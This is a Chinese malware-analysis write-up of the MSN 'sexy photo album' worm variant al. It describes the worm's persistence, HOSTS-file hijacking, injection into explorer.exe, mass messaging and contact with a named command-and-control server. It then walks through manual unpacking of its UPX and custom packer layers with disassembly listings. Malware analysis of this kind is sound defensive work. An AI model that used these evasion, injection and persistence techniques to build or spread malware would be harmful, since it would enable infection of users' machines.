00404115 50 PUSH EAX ; hProcess = FFFFFFFF
00404116 FF15 C4804000 CALL DWORD PTR DS:[4080C4] ; kernel32.SetPriorityClass
0040411C 6A 0F PUSH 0F
0040411E FF15 C0804000 CALL DWORD PTR DS:[4080C0] ; kernel32.GetCurrentThread
00404124 50 PUSH EAX
00404125 FF15 BC804000 CALL DWORD PTR DS:[4080BC] ; kernel32.SetThreadPriority
0040412B 8D85 BCFDFFFF LEA EAX,DWORD PTR SS:[EBP-244]
00404131 50 PUSH EAX
00404132 FF15 78814000 CALL DWORD PTR DS:[408178] ; SHELL32.ShellExecuteExA(调用运行控制台程序执行命令).
00404138 6A 40 PUSH 40 ; Priority = IDLE_PRIORITY_CLASS
0040413A FFB5 F4FDFFFF PUSH DWORD PTR SS:[EBP-20C]
00404140 FF15 C4804000 CALL DWORD PTR DS:[4080C4] ; kernel32.SetPriorityClass
00404146 6A 01 PUSH 1
00404148 FFB5 F4FDFFFF PUSH DWORD PTR SS:[EBP-20C]
0040414E FF15 B8804000 CALL DWORD PTR DS:[4080B8] ; kernel32.SetProcessPriorityBoost
00404154 6A 00 PUSH 0
00404156 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040415C 50 PUSH EAX
0040415D 6A 01 PUSH 1
0040415F 6A 04 PUSH 4
00404161 FF15 70814000 CALL DWORD PTR DS:[408170] ; SHELL32.SHChangeNotify
00404167 6A 00 PUSH 0 ; /status = 0
00404169 E8 22300000 CALL misfotos.00407190 ; JMP 到 msvcrt.exit(关闭退出).
0040416E C9 LEAVE
0040416F C3 RETN ; 返回.
----------------------------------------------------------
文章名称:蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
文章类型:病毒反汇编逆向分析
编写作者:Coderui
编写日期:2008年06月13日
作者博客:http://hi.baidu.com/coderui
////////////////////////////////////////////////////////////////////////////////////////////////////
****************************************************************************************************
----------------------------------------------------------------------------------------------------
病毒功能简述:
病毒名称:Worm/MSN.SendPhoto.al
中 文 名:“性感相册”变种al
病毒长度:23040 字节
病毒类型:蠕虫
危险级别:★★
影响平台:Win 9X/ME/NT/2000/XP/2003
病毒描述:
Worm/MSN.SendPhoto.al“性感相册”变种al是蠕虫家族的最新成员之一,采用高级语言编写,并经过添加多层保护壳处理。“性感相册”变种al运行后,会自我复制到被感染计算机系统的“%SystemRoot%\system32\”目录下,并重新命名为“waccs.exe”(文件属性设置为:系统、隐藏、只读)。“性感相册”变种al会在被感染计算机的后台强行篡改用户系统中的HOSTS文件,利用域名映像劫持技术禁止用户访问与安全相关的网站。“性感相册”变种al在运行时,采用进程隐藏技术使自身的进程运行后不显示,这样可以使用户很难发现该病毒的存在。“性感相册”变种al在运行时,会在被感染计算机的后台将恶意可执行代码注入到系统桌面程序“explorer.exe”进程内存的空间中,并调用执行[其中,所注入的恶意代码的功能是:1、以共享方式打开"%SystemRoot%\system32\waccs.exe"文件,防止用户删除该病毒主程序文件。2、建立互斥量“t3x0”,利用进程守护技术原理,用系统“explorer.exe”进程来保护病毒主程序进程不被关闭(循环监视病毒主程序进程是否被关闭,如果发现被关闭则重新调用运行)。]。“性感相册”变种al会在被感染计算机系统的后台利用“E-MAIL”邮件和“MSN”等聊天工具进行群发恶意广告信息,可能还会利用“E-MAIL”邮件和“MSN”等聊天工具进行自我传播。“性感相册”变种al在运行时,会在被感染计算机系统的后台不段循环与骇客指定远程服务器(其中,通信地址为:“http://www.secure.freebsd.la”)进行秘密数据通信,接收从骇客服务器返回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作。“性感相册”变种al会通过在注册表启动项中添加新键的方式,来实现开机蠕虫病毒自启动。
----------------------------------------------------------------------------------------------------
一、手动脱壳部分(三层壳:UPX + 未知壳 + 压缩壳.):
第一层:UPX
0041D100 > 60 PUSHAD ; 第一层UPX壳入口处.[F8]向下走一步.
0041D101 BE 00804100 MOV ESI,misfotos.00418000 ; 根据"ESP守恒定律",利用命令"HR ESP"下硬件断点,[F9]运行.
0041D106 8DBE 0090FEFF LEA EDI,DWORD PTR DS:[ESI+FFFE9000]
0041D10C 57 PUSH EDI
0041D10D 83CD FF OR EBP,FFFFFFFF
0041D110 EB 10 JMP SHORT misfotos.0041D122
.
.
.
0041D24B 8D4424 80 LEA EAX,DWORD PTR SS:[ESP-80] ; 运行后停在这里.利用命令"HD"删除硬件断点.
0041D24F 6A 00 PUSH 0
0041D251 39C4 CMP ESP,EAX
0041D253 ^ 75 FA JNZ SHORT misfotos.0041D24F
0041D255 83EC 80 SUB ESP,-80
0041D258 - E9 EB44FEFF JMP misfotos.00401748 ; 这里是关键跳转,[F4]运行到这里,再[F8]一次,就到了下一个壳的OEP入口.
----------------------------------------------------------------------------------------------------
第二层:未知壳
00401748 68 A0000000 PUSH 0A0 ; 第二层未知壳入口处.[F8]向下一直走.
0040174D FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401753 2315 10FE4000 AND EDX,DWORD PTR DS:[40FE10]
00401759 B8 D5D4C5E4 MOV EAX,E4C5D4D5
0040175E BA 8AF84694 MOV EDX,9446F88A
00401763 68 00000000 PUSH 0
00401768 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
0040176E 330D F0FF4000 XOR ECX,DWORD PTR DS:[40FFF0]
00401774 2915 B0F84000 SUB DWORD PTR DS:[40F8B0],EDX
0040177A B9 FE6FDB94 MOV ECX,94DB6FFE
0040177F 60 PUSHAD
00401780 68 78000000 PUSH 78
00401785 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
0040178B B8 99B0188D MOV EAX,8D18B099
00401790 23CA AND ECX,EDX
00401792 C1D2 13 RCL EDX,13
00401795 68 5A000000 PUSH 5A
0040179A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
004017A0 B8 F52BFF3B MOV EAX,3BFF2BF5
004017A5 0BC1 OR EAX,ECX
004017A7 E9 0C000000 JMP misfotos.004017B8
004017AC 81DA 41B3616E SBB EDX,6E61B341
004017B2 81E1 02074014 AND ECX,14400702
004017B8 68 F0000000 PUSH 0F0
004017BD FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004017C3 C1C2 14 ROL EDX,14
004017C6 2BC1 SUB EAX,ECX
004017C8 1315 80FC4000 ADC EDX,DWORD PTR DS:[40FC80]
004017CE 6A 40 PUSH 40
004017D0 68 78000000 PUSH 78
004017D5 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004017DB 13C8 ADC ECX,EAX
004017DD B8 8EC095D3 MOV EAX,D395C08E
004017E2 E9 0A000000 JMP misfotos.004017F1
004017E7 2BC1 SUB EAX,ECX
004017E9 C1D9 13 RCR ECX,13
004017EC BA DA3D088C MOV EDX,8C083DDA
004017F1 68 5A000000 PUSH 5A
004017F6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004017FC C1D0 17 RCL EAX,17
004017FF 1BD1 SBB EDX,ECX
00401801 E9 0B000000 JMP misfotos.00401811
00401806 B9 D9B0C767 MOV ECX,67C7B0D9
0040180B 0115 D0FF4000 ADD DWORD PTR DS:[40FFD0],EDX
00401811 68 00100000 PUSH 1000
00401816 68 82000000 PUSH 82
0040181B FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401821 23C1 AND EAX,ECX
00401823 81CA 3592BBAE OR EDX,AEBB9235
00401829 1905 10F94000 SBB DWORD PTR DS:[40F910],EAX
0040182F 68 46000000 PUSH 46
00401834 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
0040183A C1F1 1C SAL ECX,1C
0040183D B8 56BE5D76 MOV EAX,765DBE56
00401842 E9 0C000000 JMP misfotos.00401853
00401847 81D1 C57C94A5 ADC ECX,A5947CC5
0040184D 40 INC EAX
0040184E BA F96C60E2 MOV EDX,E2606CF9
00401853 68 6E000000 PUSH 6E
00401858 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
0040185E 03C8 ADD ECX,EAX
00401860 81C2 41CE4169 ADD EDX,6941CE41
00401866 3BC8 CMP ECX,EAX
00401868 79 0F JNS SHORT misfotos.00401879
0040186A 330D A0FF4000 XOR ECX,DWORD PTR DS:[40FFA0]
00401870 C1D8 02 RCR EAX,2
00401873 210D B0FA4000 AND DWORD PTR DS:[40FAB0],ECX
00401879 C1D8 07 RCR EAX,7
0040187C 81CA B22C5ABB OR EDX,BB5A2CB2
00401882 1BD1 SBB EDX,ECX
00401884 68 14000000 PUSH 14
00401889 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
0040188F 310D F0F84000 XOR DWORD PTR DS:[40F8F0],ECX
00401895 81C2 610C3949 ADD EDX,49390C61
0040189B 1B05 A0FE4000 SBB EAX,DWORD PTR DS:[40FEA0]
004018A1 3BC8 CMP ECX,EAX
004018A3 76 0C JBE SHORT misfotos.004018B1
004018A5 81E1 29B246CB AND ECX,CB46B229
004018AB 81DA C19BC3A4 SBB EDX,A4C39BC1
004018B1 C1C0 06 ROL EAX,6
004018B4 0315 A0F84000 ADD EDX,DWORD PTR DS:[40F8A0]
004018BA 2105 50F94000 AND DWORD PTR DS:[40F950],EAX
004018C0 68 E8240000 PUSH 24E8
004018C5 68 14000000 PUSH 14
004018CA FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004018D0 3115 20FD4000 XOR DWORD PTR DS:[40FD20],EDX
004018D6 81D1 FE912D27 ADC ECX,272D91FE
004018DC 68 78000000 PUSH 78
004018E1 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
004018E7 2B05 20F84000 SUB EAX,DWORD PTR DS:[40F820]
004018ED 0BC2 OR EAX,EDX
004018EF BA E1B9BFBE MOV EDX,BEBFB9E1
004018F4 81FA F5118A80 CMP EDX,808A11F5
004018FA 75 11 JNZ SHORT misfotos.0040190D
004018FC B8 3EC66BBE MOV EAX,BE6BC63E
00401901 81C9 41E9FB10 OR ECX,10FBE941
00401907 2905 B0F84000 SUB DWORD PTR DS:[40F8B0],EAX
0040190D B9 09053E33 MOV ECX,333E0509
00401912 BA A1807B32 MOV EDX,327B80A1
00401917 1B05 70FD4000 SBB EAX,DWORD PTR DS:[40FD70]
0040191D 68 28000000 PUSH 28
00401922 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401928 C1C9 1E ROR ECX,1E
0040192B 0105 D0FA4000 ADD DWORD PTR DS:[40FAD0],EAX
00401931 E9 0D000000 JMP misfotos.00401943
00401936 B9 B16624FB MOV ECX,FB2466B1
0040193B 1915 00FD4000 SBB DWORD PTR DS:[40FD00],EDX
00401941 13D1 ADC EDX,ECX
00401943 6A 00 PUSH 0
00401945 68 F0000000 PUSH 0F0
0040194A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401950 1105 90FF4000 ADC DWORD PTR DS:[40FF90],EAX
00401956 BA FAFEEA35 MOV EDX,35EAFEFA
0040195B 3BC1 CMP EAX,ECX
0040195D 79 09 JNS SHORT misfotos.00401968
0040195F 42 INC EDX
00401960 2B05 20FF4000 SUB EAX,DWORD PTR DS:[40FF20]
00401966 2BCA SUB ECX,EDX
00401968 3305 50FC4000 XOR EAX,DWORD PTR DS:[40FC50]
0040196E B9 FEA2EB76 MOV ECX,76EBA2FE
00401973 68 64000000 PUSH 64
00401978 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
0040197E 13C8 ADC ECX,EAX
00401980 33CA XOR ECX,EDX
00401982 81C1 9D3A4307 ADD ECX,7433A9D
00401988 E9 0C000000 JMP misfotos.00401999
0040198D 81C2 EA541683 ADD EDX,831654EA
00401993 81D1 72147E2A ADC ECX,2A7E1472
00401999 68 3C000000 PUSH 3C
0040199E FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004019A4 3315 E0FA4000 XOR EDX,DWORD PTR DS:[40FAE0]
004019AA 81C1 2DF6770C ADD ECX,0C77F62D
004019B0 81E9 A1DB420D SUB ECX,0D42DBA1
004019B6 3B05 64FD4000 CMP EAX,DWORD PTR DS:[40FD64]
004019BC 7E 04 JLE SHORT misfotos.004019C2
004019BE C1F2 09 SAL EDX,9
004019C1 41 INC ECX
004019C2 1105 C0FD4000 ADC DWORD PTR DS:[40FDC0],EAX
004019C8 2315 B0FD4000 AND EDX,DWORD PTR DS:[40FDB0]
004019CE FF15 4E924100 CALL DWORD PTR DS:[41924E] ; kernel32.VirtualAlloc
004019D4 8BF0 MOV ESI,EAX
004019D6 68 46000000 PUSH 46
004019DB FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004019E1 81D1 E665EAFA ADC ECX,FAEA65E6
004019E7 3105 40FA4000 XOR DWORD PTR DS:[40FA40],EAX
004019ED 3BCA CMP ECX,EDX
004019EF 79 08 JNS SHORT misfotos.004019F9
004019F1 0BD1 OR EDX,ECX
004019F3 B9 D5A0E402 MOV ECX,2E4A0D5
004019F8 40 INC EAX
004019F9 0915 F0FE4000 OR DWORD PTR DS:[40FEF0],EDX
004019FF 0BD0 OR EDX,EAX
00401A01 68 32000000 PUSH 32
00401A06 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401A0C 0BC8 OR ECX,EAX
00401A0E 0BC8 OR ECX,EAX
00401A10 3B15 40FE4000 CMP EDX,DWORD PTR DS:[40FE40]
00401A16 71 0E JNO SHORT misfotos.00401A26
00401A18 1905 30F94000 SBB DWORD PTR DS:[40F930],EAX
00401A1E BA 9DDD9596 MOV EDX,9695DD9D
00401A23 C1E9 1E SHR ECX,1E
00401A26 B8 3EE8BC94 MOV EAX,94BCE83E
00401A2B 81C1 861A3829 ADD ECX,29381A86
00401A31 81E9 F15DE68A SUB ECX,8AE65DF1
00401A37 56 PUSH ESI
00401A38 68 00000000 PUSH 0
00401A3D FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401A43 0115 90FA4000 ADD DWORD PTR DS:[40FA90],EDX
00401A49 81E1 B524DB34 AND ECX,34DB24B5
00401A4F BA 2A9C114C MOV EDX,4C119C2A
00401A54 3B05 EAFE4000 CMP EAX,DWORD PTR DS:[40FEEA]
00401A5A 79 0F JNS SHORT misfotos.00401A6B
00401A5C C1D1 1C RCL ECX,1C
00401A5F 81C9 B1DCFAD0 OR ECX,D0FADCB1
00401A65 81D2 D2D09685 ADC EDX,8596D0D2
00401A6B C1E8 16 SHR EAX,16
00401A6E 1BCA SBB ECX,EDX
00401A70 68 00000000 PUSH 0
00401A75 68 FA000000 PUSH 0FA
00401A7A FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401A80 81CA 16FA2657 OR EDX,5726FA16
00401A86 0905 E0FF4000 OR DWORD PTR DS:[40FFE0],EAX
00401A8C 3B15 EAFE4000 CMP EDX,DWORD PTR DS:[40FEEA]
00401A92 76 0B JBE SHORT misfotos.00401A9F
00401A94 B9 395EFC83 MOV ECX,83FC5E39
00401A99 0B15 D0F94000 OR EDX,DWORD PTR DS:[40F9D0]
00401A9F 81C1 65825161 ADD ECX,61518265
00401AA5 C1E0 07 SHL EAX,7
00401AA8 C1EA 0B SHR EDX,0B
00401AAB 68 64000000 PUSH 64
00401AB0 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401AB6 B8 F918B92E MOV EAX,2EB918F9
00401ABB 1BC2 SBB EAX,EDX
00401ABD E9 0B000000 JMP misfotos.00401ACD
00401AC2 B9 869B3EB7 MOV ECX,B73E9B86
00401AC7 1B05 F0FE4000 SBB EAX,DWORD PTR DS:[40FEF0]
00401ACD BB 60124000 MOV EBX,misfotos.00401260
00401AD2 68 96000000 PUSH 96
00401AD7 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401ADD C1EA 05 SHR EDX,5
00401AE0 290D C0FD4000 SUB DWORD PTR DS:[40FDC0],ECX
00401AE6 3BD1 CMP EDX,ECX
00401AE8 7E 08 JLE SHORT misfotos.00401AF2
00401AEA BA C66B979C MOV EDX,9C976BC6
00401AEF C1C1 11 ROL ECX,11
00401AF2 03CA ADD ECX,EDX
00401AF4 3315 10FB4000 XOR EDX,DWORD PTR DS:[40FB10]
00401AFA 2BD1 SUB EDX,ECX
00401AFC 68 6E000000 PUSH 6E
00401B01 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401B07 0305 20FE4000 ADD EAX,DWORD PTR DS:[40FE20]
00401B0D B9 A5000ABB MOV ECX,BB0A00A5
00401B12 03C2 ADD EAX,EDX
00401B14 68 14000000 PUSH 14
00401B19 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401B1F 3315 90FC4000 XOR EDX,DWORD PTR DS:[40FC90]
00401B25 23D1 AND EDX,ECX
00401B27 68 A0000000 PUSH 0A0
00401B2C FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401B32 B9 AAD1A3A8 MOV ECX,A8A3D1AA
00401B37 40 INC EAX
00401B38 81FA 3A9082CD CMP EDX,CD82903A
00401B3E 7A 07 JPE SHORT misfotos.00401B47
00401B40 0BD1 OR EDX,ECX
00401B42 B8 524E36FD MOV EAX,FD364E52
00401B47 B9 5A47DD0D MOV ECX,0DDD475A
00401B4C C1D2 10 RCL EDX,10
00401B4F FF33 PUSH DWORD PTR DS:[EBX]
00401B51 68 3C000000 PUSH 3C
00401B56 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401B5C 2B0D D0FF4000 SUB ECX,DWORD PTR DS:[40FFD0]
00401B62 81CA 02BDDE9F OR EDX,9FDEBD02
00401B68 81F9 2D7FA92C CMP ECX,2CA97F2D
00401B6E 7D 0A JGE SHORT misfotos.00401B7A
00401B70 C1C2 1D ROL EDX,1D
00401B73 23D0 AND EDX,EAX
00401B75 B8 B6B34935 MOV EAX,3549B3B6
00401B7A 03D1 ADD EDX,ECX
00401B7C B9 C66C3771 MOV ECX,71376CC6
00401B81 68 B4000000 PUSH 0B4
00401B86 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401B8C 81C9 4AE9DD0F OR ECX,0FDDE94A
00401B92 23C2 AND EAX,EDX
00401B94 C1E2 18 SHL EDX,18
00401B97 8F06 POP DWORD PTR DS:[ESI]
00401B99 68 F0000000 PUSH 0F0
00401B9E FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401BA4 81D2 A513B20F ADC EDX,0FB213A5
00401BAA 81EA D9325608 SUB EDX,85632D9
00401BB0 3B0D 58FA4000 CMP ECX,DWORD PTR DS:[40FA58]
00401BB6 71 0E JNO SHORT misfotos.00401BC6
00401BB8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401BBE 2B0D E0F84000 SUB ECX,DWORD PTR DS:[40F8E0]
00401BC4 13C2 ADC EAX,EDX
00401BC6 2B15 C0FE4000 SUB EDX,DWORD PTR DS:[40FEC0]
00401BCC B9 46AD58D4 MOV ECX,D458AD46
00401BD1 68 3C000000 PUSH 3C
00401BD6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401BDC 81D2 560493C0 ADC EDX,C0930456
00401BE2 2B05 50FC4000 SUB EAX,DWORD PTR DS:[40FC50]
00401BE8 B9 66C9A1A9 MOV ECX,A9A1C966
00401BED 8136 838221BB XOR DWORD PTR DS:[ESI],BB218283
00401BF3 68 F0000000 PUSH 0F0
00401BF8 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401BFE C1C0 0A ROL EAX,0A
00401C01 1915 00FC4000 SBB DWORD PTR DS:[40FC00],EDX
00401C07 1BC8 SBB ECX,EAX
00401C09 81FA F18ED7B1 CMP EDX,B1D78EF1
00401C0F 71 0D JNO SHORT misfotos.00401C1E
00401C11 13D0 ADC EDX,EAX
00401C13 B8 9AB6D2C1 MOV EAX,C1D2B69A
00401C18 81D9 22BB5FB5 SBB ECX,B55FBB22
00401C1E C1C8 11 ROR EAX,11
00401C21 03D1 ADD EDX,ECX
00401C23 68 8C000000 PUSH 8C
00401C28 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401C2E 0B05 00FE4000 OR EAX,DWORD PTR DS:[40FE00]
00401C34 81D9 C9CE2159 SBB ECX,5921CEC9
00401C3A 68 5A000000 PUSH 5A
00401C3F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401C45 2BC2 SUB EAX,EDX
00401C47 1B0D 60FB4000 SBB ECX,DWORD PTR DS:[40FB60]
00401C4D E9 0F000000 JMP misfotos.00401C61
00401C52 1B05 30FB4000 SBB EAX,DWORD PTR DS:[40FB30]
00401C58 C1C2 04 ROL EDX,4
00401C5B 81C1 1206B1A2 ADD ECX,A2B10612
00401C61 8106 410E9B09 ADD DWORD PTR DS:[ESI],99B0E41
00401C67 68 14000000 PUSH 14
00401C6C 68 E6000000 PUSH 0E6
00401C71 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401C77 81DA D197286B SBB EDX,6B2897D1
00401C7D 81C1 E9767E1F ADD ECX,1F7E76E9
00401C83 E9 0B000000 JMP misfotos.00401C93
00401C88 B8 3A429A7D MOV EAX,7D9A423A
00401C8D 1315 20FD4000 ADC EDX,DWORD PTR DS:[40FD20]
00401C93 68 C8000000 PUSH 0C8
00401C98 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401C9E C1D8 05 RCR EAX,5
00401CA1 BA 5A7944FA MOV EDX,FA44795A
00401CA6 3B0D 26FF4000 CMP ECX,DWORD PTR DS:[40FF26]
00401CAC 72 09 JB SHORT misfotos.00401CB7
00401CAE C1DA 02 RCR EDX,2
00401CB1 210D 70FA4000 AND DWORD PTR DS:[40FA70],ECX
00401CB7 1BD0 SBB EDX,EAX
00401CB9 B9 5E1AF8E0 MOV ECX,E0F81A5E
00401CBE 68 A0000000 PUSH 0A0
00401CC3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401CC9 81DA B9742043 SBB EDX,432074B9
00401CCF C1E1 06 SHL ECX,6
00401CD2 E9 0B000000 JMP misfotos.00401CE2
00401CD7 81D1 0122DAA3 ADC ECX,A3DA2201
00401CDD BA 8E48FDE4 MOV EDX,E4FD488E
00401CE2 81C3 1151EC60 ADD EBX,60EC5111
00401CE8 68 D2000000 PUSH 0D2
00401CED FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401CF3 C1E9 13 SHR ECX,13
00401CF6 81EA DA05CDAB SUB EDX,ABCD05DA
00401CFC E9 0D000000 JMP misfotos.00401D0E
00401D01 B9 75BDE543 MOV ECX,43E5BD75
00401D06 BA 4D8AE267 MOV EDX,67E28A4D
00401D0B C1C8 03 ROR EAX,3
00401D0E 68 FA000000 PUSH 0FA
00401D13 68 C8000000 PUSH 0C8
00401D18 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401D1E BA 167E846E MOV EDX,6E847E16
00401D23 C1C8 03 ROR EAX,3
00401D26 3B15 74FC4000 CMP EDX,DWORD PTR DS:[40FC74]
00401D2C 76 0C JBE SHORT misfotos.00401D3A
00401D2E 1905 C0FE4000 SBB DWORD PTR DS:[40FEC0],EAX
00401D34 1B15 E0F84000 SBB EDX,DWORD PTR DS:[40F8E0]
00401D3A B8 E9C146FE MOV EAX,FE46C1E9
00401D3F 1B15 B0F84000 SBB EDX,DWORD PTR DS:[40F8B0]
00401D45 1B05 50FB4000 SBB EAX,DWORD PTR DS:[40FB50]
00401D4B 81C3 F3AE139F ADD EBX,9F13AEF3
00401D51 68 28000000 PUSH 28
00401D56 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401D5C C1D9 0B RCR ECX,0B
00401D5F 81C1 F9C4B1D6 ADD ECX,D6B1C4F9
00401D65 1915 80FD4000 SBB DWORD PTR DS:[40FD80],EDX
00401D6B 68 A0000000 PUSH 0A0
00401D70 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401D76 23D1 AND EDX,ECX
00401D78 0305 20FC4000 ADD EAX,DWORD PTR DS:[40FC20]
00401D7E C1DA 13 RCR EDX,13
00401D81 3B0D 6CFF4000 CMP ECX,DWORD PTR DS:[40FF6C]
00401D87 71 0E JNO SHORT misfotos.00401D97
00401D89 C1D2 1A RCL EDX,1A
00401D8C 81E2 8DCC5475 AND EDX,7554CC8D
00401D92 B8 BAC7C622 MOV EAX,22C6C7BA
00401D97 C1FA 12 SAR EDX,12
00401D9A C1C1 08 ROL ECX,8
00401D9D 81C6 6AED2E2F ADD ESI,2F2EED6A
00401DA3 68 E6000000 PUSH 0E6
00401DA8 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401DAE 1B05 50F94000 SBB EAX,DWORD PTR DS:[40F950]
00401DB4 B9 6AA78799 MOV ECX,9987A76A
00401DB9 81FA F23E3F93 CMP EDX,933F3EF2
00401DBF 72 07 JB SHORT misfotos.00401DC8
00401DC1 23D0 AND EDX,EAX
00401DC3 B9 16DFEE35 MOV ECX,35EEDF16
00401DC8 81C1 12580249 ADD ECX,49025812
00401DCE 13C2 ADC EAX,EDX
00401DD0 68 C8000000 PUSH 0C8
00401DD5 68 0A000000 PUSH 0A
00401DDA FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401DE0 81D2 46B0111A ADC EDX,1A11B046
00401DE6 B9 3DCFF281 MOV ECX,81F2CF3D
00401DEB B8 950F5EFE MOV EAX,FE5E0F95
00401DF0 81FA CA307D84 CMP EDX,847D30CA
00401DF6 7A 08 JPE SHORT misfotos.00401E00
00401DF8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401DFE 1BC2 SBB EAX,EDX
00401E00 1BD1 SBB EDX,ECX
00401E02 C1F9 18 SAR ECX,18
00401E05 68 3C000000 PUSH 3C
00401E0A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401E10 0BC8 OR ECX,EAX
00401E12 1BD0 SBB EDX,EAX
00401E14 0305 80FA4000 ADD EAX,DWORD PTR DS:[40FA80]
00401E1A 81C6 9A12D1D0 ADD ESI,D0D1129A
00401E20 81FB 48174000 CMP EBX,misfotos.00401748
00401E26 ^ 0F85 A6FCFFFF JNZ misfotos.00401AD2 ; 这里的向上回跳不要跳,我们直接执行到下一行的代码处,因为这里是循环.
00401E2C 68 50000000 PUSH 50 ; [F4]运行到这里,继续[F8]向下一直走.
00401E31 68 8C000000 PUSH 8C
00401E36 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401E3C 13D1 ADC EDX,ECX
00401E3E C1C8 1B ROR EAX,1B
00401E41 BA B13EEE10 MOV EDX,10EE3EB1
00401E46 81F9 9E40C622 CMP ECX,22C6409E
00401E4C 7E 0B JLE SHORT misfotos.00401E59
00401E4E 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E54 B9 79450E10 MOV ECX,100E4579
00401E59 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E5F B9 C18E4B4F MOV ECX,4F4B8EC1
00401E64 23D0 AND EDX,EAX
00401E66 68 14000000 PUSH 14
00401E6B FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401E71 0905 60FF4000 OR DWORD PTR DS:[40FF60],EAX
00401E77 03C1 ADD EAX,ECX
00401E79 E9 0C000000 JMP misfotos.00401E8A
00401E7E C1E1 08 SHL ECX,8
00401E81 0B05 90FB4000 OR EAX,DWORD PTR DS:[40FB90]
00401E87 C1CA 0C ROR EDX,0C
00401E8A 68 BE000000 PUSH 0BE
00401E8F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401E95 C1E1 1A SHL ECX,1A
00401E98 BA 66CD8033 MOV EDX,3380CD66
00401E9D 5B POP EBX
00401E9E 68 F0000000 PUSH 0F0
00401EA3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401EA9 48 DEC EAX
00401EAA BA A97A171B MOV EDX,1B177AA9
00401EAF 81EA FD9A1BC0 SUB EDX,C01B9AFD
00401EB5 81F9 02AAC65E CMP ECX,5EC6AA02
00401EBB 72 08 JB SHORT misfotos.00401EC5
00401EBD C1F0 11 SAL EAX,11
00401EC0 B9 853F21A6 MOV ECX,A6213F85
00401EC5 C1F0 02 SAL EAX,2
00401EC8 BA B5C941E2 MOV EDX,E241C9B5
00401ECD 03D1 ADD EDX,ECX
00401ECF 68 AA000000 PUSH 0AA
00401ED4 68 BE000000 PUSH 0BE
00401ED9 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401EDF 81C1 428C77DA ADD ECX,DA778C42
00401EE5 2915 20FD4000 SUB DWORD PTR DS:[40FD20],EDX
00401EEB FFD3 CALL EBX ; 到这里后千万不要按[F8]去步过执行,那么会跑飞的.应该按[F7]进去,里边是下一个壳的OEP入口.
00401EED 68 3C000000 PUSH 3C
00401EF2 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401EF8 03C1 ADD EAX,ECX
